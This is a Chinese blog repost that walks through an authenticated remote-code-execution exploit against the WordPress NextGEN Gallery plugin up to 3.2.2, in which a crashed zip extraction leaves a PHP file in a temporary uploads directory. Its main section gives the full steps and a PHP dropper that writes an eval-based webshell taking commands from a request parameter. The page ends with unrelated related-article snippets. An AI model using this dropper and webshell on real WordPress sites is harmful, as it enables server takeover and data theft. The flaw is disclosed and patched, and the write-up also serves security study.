WordPress插件NextGEN Gallery <= 3.2.2 RCE漏洞利用(需要登录)

最新推荐文章于 2024-11-06 23:00:53 发布
最新推荐文章于 2024-11-06 23:00:53 发布
阅读量310 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/dgjnszf/p/11088429.html
版权

WordPress插件NextGEN Gallery <= 3.2.2版本将上传的zip压缩包解压到/wp-content/uploads目录下的临时目录,该临时目录具有显著特点:以unpacked开头。

当zip压缩文件包含大量图片时将导致处理进程崩溃,而临时目录没有删除。如果在zip压缩包中放置一个php文件,那么该php文件会被解压到临时目录造成RCE漏洞。

官方在2019年6月4日发布了3.2.4版本修复了漏洞。

 

第1步:制作Zip压缩包

我制作了一个包含800张图片和1个恶意php文件(abc233.php)的zip压缩包,图片都是几KB的小图片,恶意php文件的功能是往上级目录写入webshell,abc233.php文件内容如下:

<?php
    file_put_contents('../webshell666.php', '<?php @eval($_REQUEST["cmdx"]);?>');
?>

第2步:上传zip压缩包

点击“Add Gallery / Images”然后上传zip压缩包。

第3步:查看临时目录

点击“import folder”,再点击“uploads”即可看到解压的临时目录。

 

第4步:生成webshell

访问临时目录下的abc233.php文件即可在/wp-content/uploads目录下生成webshell。

http://192.168.56.1/wp-content/uploads/unpacked-phpA0CB.tmp/abc233.php

 

参考链接:

https://medium.com/websec/wordpress-nextgen-gallery-race-condition-to-rce-d64695ef3d5c

 

转载于:https://www.cnblogs.com/dgjnszf/p/11088429.html

weixin_30311605
关注
最强的相册插件NextGEN Gallery
10-17
博客照片很多?上传和管理图片太烦?想幻灯显示相册?在博客中任意插入动态图片效果?如果想为你的WordPress找个相册插件,那么NextGEN Gallery插件最适合了,功能很强大,提供了很完美的照片管理方法,操作也并不复杂。Look一下NextGEN Gallery可实现的功能吧: 可以通过拖拉进行相册的排序,跟 widget 一樣样,你想要怎么排序用拉就可以,所见既所得 ! 浮水印功能,可在照片上加上文字或图片 可以上传图片的压缩文件 (zip),或直接导入图片的文件夹,懒人的最爱,省去上传的时间。 內建 JavaScript 效果 ,Thickbox,Greybox or Lightbox ,效果很炫。 可自己编辑CSS文件,通过 css 你可以打造属于自己的相册风格 !! Slideshow - 自动播放图片,还有许多变化效果。 Sidebar Widget - 随机显示图片的 widget ,可以显示在 sidebar 內。 可以在文章内调用图片,与附件完美整合到编辑页面的选择栏内,太方便了。 看到这些功能,是否有点让你心动啊,要是心动的话,那么就接着向下看,看看它的安装与使用。 NextGEN Gallery插件安装: 下载NextGEN Gallery插件,将文件解压缩,上传到/wp-content/plugins/目录。 登录wordpress后台控制面板激活该插件,这是后台左侧栏或多出个Gallery标签,点击标签会出现下拉列表,可以对其进行相应的设置:如下图: 下面我们简单介绍下列表中的这些链接。 Overview 这个里面介绍当前服务配置的一些信息和插件的相关内容。 Add Gallery/Images 添加新的图库,在这里可以添加新的图库、上传压缩文件、导入图片文件夹等操作。如下图: Manage Gallery 管理建立的图片库,可以添加图片的Alt、Title、Description、tag等信息。 Album 添加相簿目录,你可以可以把建立好的Gallery目录拖拽到album中。 Tages 管理图片的相关Tag标签,新建、删除、编辑Tag都可以。 Options Gallery options的设置,设置生成缩略图的尺寸、图片显示尺寸、图片的相关设置等信息,这里面的设置操作比较多,由于时间关系不一一说明了。 Style 设置css样式,打造属于自己的相册风格 Setup 卸载相关插件 Roles 赋予图片管理者相关的权限 这款插件的使用还是比较方便的,激活后,点击“Add Gallery/Images”新建图片目录,然后,把相关图片上传的目录下,设置好相关信息就OK了,调用这些插件方法如下: 发表文章或新建页面时,点击图标,出现如下图的选项框: 选择相关的图片库文件名,单击“Insert(插入)”就OK了
Wordpress 相册插件 NextGEN-Gallery 添加目录将中文转为拼音的解决办法
10-28
在当前的IT和网络环境中,基于Wordpress平台的内容管理系统以其易用性和丰富的插件生态而广受欢迎。尤其是在构建网站和博客时,人们经常使用相册插件来展示图片集。NextGEN Gallery插件便是其中的一个流行选项,它...
WordPress NextGEN Gallery插件路径泄露漏洞
weixin_30295091的博客
02-26 122
漏洞名称: WordPress NextGEN Gallery插件路径泄露漏洞 CNNVD编号: CNNVD-201302-398 发布时间: 2013-02-25 更新时间: 2013-02-25 危害等级: 漏洞类型: 信息泄露 威胁类型: 远程 CVE编号: CVE...
百万用户使用的插件 WordPress NextGEN Gallery出现SQL注入漏洞 站长们赶紧自查
weixin_33824363的博客
09-01 364
这次来了一个批量漏洞包啊,20个WordPress插件出现重要漏洞(见下方的表格),其中WordPress NextGEN Gallery插件更是拥有过百万的装机量,波及面较大。 各位站长们需要有两个动作,1赶紧看看自己是否使用了这些插件,2赶紧看看使用的补丁是否有升级版本。绿盟科技就此问题发布了安全威胁通告。 NextGEN Gallery是做什么...
nextgen-gallery插件的使用
networkingworld的专栏
09-11 896
wordpress主程序提供给我们使用的功能,有时候会觉得,可用性还是觉得不够,那么下面我们就来介绍一些非常实用的插件,也是一些非常基本的插件。 1.nextgen-gallery 相册 nextgen-gallery相册插件是众所周知的wordpress相册插件,这款插件非常强大,几乎可以说是最好的一款图片插件,下面 我们就来看看这款插件的使用方法把! 1.相册(图集)的增加和设置,
WordPress NextGEN Gallery ‘upload.php’任意文件上传漏洞
weixin_30919235的博客
06-20 213
漏洞名称: WordPress NextGEN Gallery ‘upload.php’任意文件上传漏洞 CNNVD编号: CNNVD-201306-259 发布时间: 2013-06-20 更新时间: 2013-06-20 危害等级: 漏洞类型: 代码注入 威胁类型: 远程 ...
convert-nextgen-galleries:这是一个 WordPress 插件,可以将 NextGEN Gallery 格式的图片库转换为原生 WordPress
07-08
[nggallery] 短代码替换为相应的 [gallery] 短代码,并且所有图像都从 NextGEN 图像区域复制到通常的 WordPress 媒体中心。 如何使用它 备份您的数据库和文件。 安装并激活此插件。 如果您使用 Git,您可以在 ...
WordPress 相册插件 NextGEN-Gallery 添加目录将中文转为拼音的解决办法
01-20
NextGEN GalleryWordpress中著名的相册插件,遗憾的是不支持中文等unicode字符,本文将介绍如何将目录转换为拼音(添加图集时)。 以NextGEN 1.6.2为例: “新增图集/图片”的路径是:admin....
Nextgen Gallery Wrodpress图片画廊插件
05-01
Nextgen Gallery是一款专门为WordPress设计的强大图片画廊插件,它为用户提供了丰富的功能,以便在网站上展示和管理图像。这款插件支持多种布局样式,包括传统的网格布局、滑动幻灯片、缩略图导航等,使得创建引人入...
WordPress插件:Imagely NextGEN Gallery Pro v3.8.0功能演示及资源下载
资源摘要信息: "WordPress插件【Imagely NextGEN Gallery Pro】v3.8.0" WordPress是一个开源的个人博客和内容管理系统(CMS),它在网站构建、新闻发布、电子商务等方面得到了广泛的应用。Imagely NextGEN Gallery ...
WordPress相册NextGEN Gallery插件汉化及使用
yg_201314的专栏
07-26 537
你希望你的博客变得炫酷吗?你想把你的酷照拿出来晒晒吗?如果想为你的WordPress找个相册插件,那么NextGEN Gallery插件最适合了,功能很强大,提供了很完美的照片管理方法,操作也并不复杂。 Look一下NextGEN Gallery可实现的功能吧: 1. 浮水印功能,可在照片上加上文字或图片 2. 可自己编辑CSS文件,通过 css 你可以打造属于自己的相册风格 !! ...
WordPress相册插件NextGEN Gallery安装使用详解
鱼汤的技术资料库
05-26 6391
如果想为WP找一个相册插件,我想NextGEN Gallery最适合了,我觉得这是我用过的最好的WP插件之一,功能很强大,提供了很完美的照片管理方法,操作也并不复杂,我第一次安装好的时候,我便决定了使用它,因为这正是我想要的。下面我将介绍一下这个插件的安装和一些使用时可能出现的问题。NextGEN Gallery可实现的功能可以通过拖拉进行相册的排序,跟 widget 一樣样,你想要怎么排
wordpress漏洞上传php文件,WordPress ReFlex Gallery插件php.php’任意文件上传漏洞
weixin_29209801的博客
03-09 338
发布日期:2012-12-30更新日期:2013-01-04受影响系统:WordPress ReFlex Gallery 1.4描述:--------------------------------------------------------------------------------BUGTRAQ ID: 57100Sammy FORGIT是合二为一的图库相册插件WordPress ...
悬镜安全丨WordPress插件漏洞影响超过100万个网站
Anprou的博客
03-03 1323
作为我们Sucuri防火墙(WAF)漏洞研究项目的一部分,为了查找存在的安全问题,我们已经审计了多个开源项目。 当审计WordPress的“NextGEN”相册插件时,我们发现了一个严重的SQL注入漏洞。 该漏洞允许一个未经授权的用户从受害人网站的数据库中偷取数据,包括用户的敏感信息。 目前,有超过100万个WordPress网站安装了这个易被攻击的插件。 你处在危
SSRF漏洞基础
时之海
02-14 253
SSRF 即Server-Side Request Forgery 服务器端请求伪造攻击,利用漏洞伪造服务器端发起请求,从而突破客户端获取本身得不到的数据,SSRF攻击的目标是从外网无法访问的内部系统。 SSRF漏洞形成的原因主要是服务器端所提供的接口中包含了所要请求的内容的URL参数,并且未对客户端所传输过来的URL参数进行过滤。 假设A网站是一个所有人都可以访问的外网网站,B网站是一个他们内部的网站,普通用户只能访问A网站,不能访问B网站,但是我们可以通过A网站做中间人,伪造身份发送请求,就可以访问B网
sql注入空格被过滤_分析多款WordPress插件中的SQL注入漏洞
weixin_39833687的博客
11-20 308
0x00 前言2019年7月,FortiGuard实验室发现并报告了9款常见WordPress插件中的9个SQL注入漏洞,这些插件类别较广,包括广告、捐赠、图库、表单、简讯以及视频播放器。目前有成千上万个WordPress站点正在使用这些插件,其中包括在某些领域中位居前列的某些站点。FortiGuard实验室为这些漏洞分配了编号以及对应的CVE ID,具体为:FG-VD-19-092、F...
【神经科学学习笔记】基于分层嵌套谱分割(Nested Spectral Partition)模型分析大脑网络整合与分离的学习总结
最新发布
Rose9614的博客
11-06 1345
需要说明的是,本文仅是笔者对NSP方法的初步尝试,主要聚焦于功能连接网络的分析。原文中还包含了结构连接网络的分析,以及功能-结构整合的深入探讨,这些都为理解大脑的组织原理提供了更全面的视角。感兴趣的小伙伴强烈建议去阅读原文~笔者也准备明天有时间再尝试计算一下局部指标。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值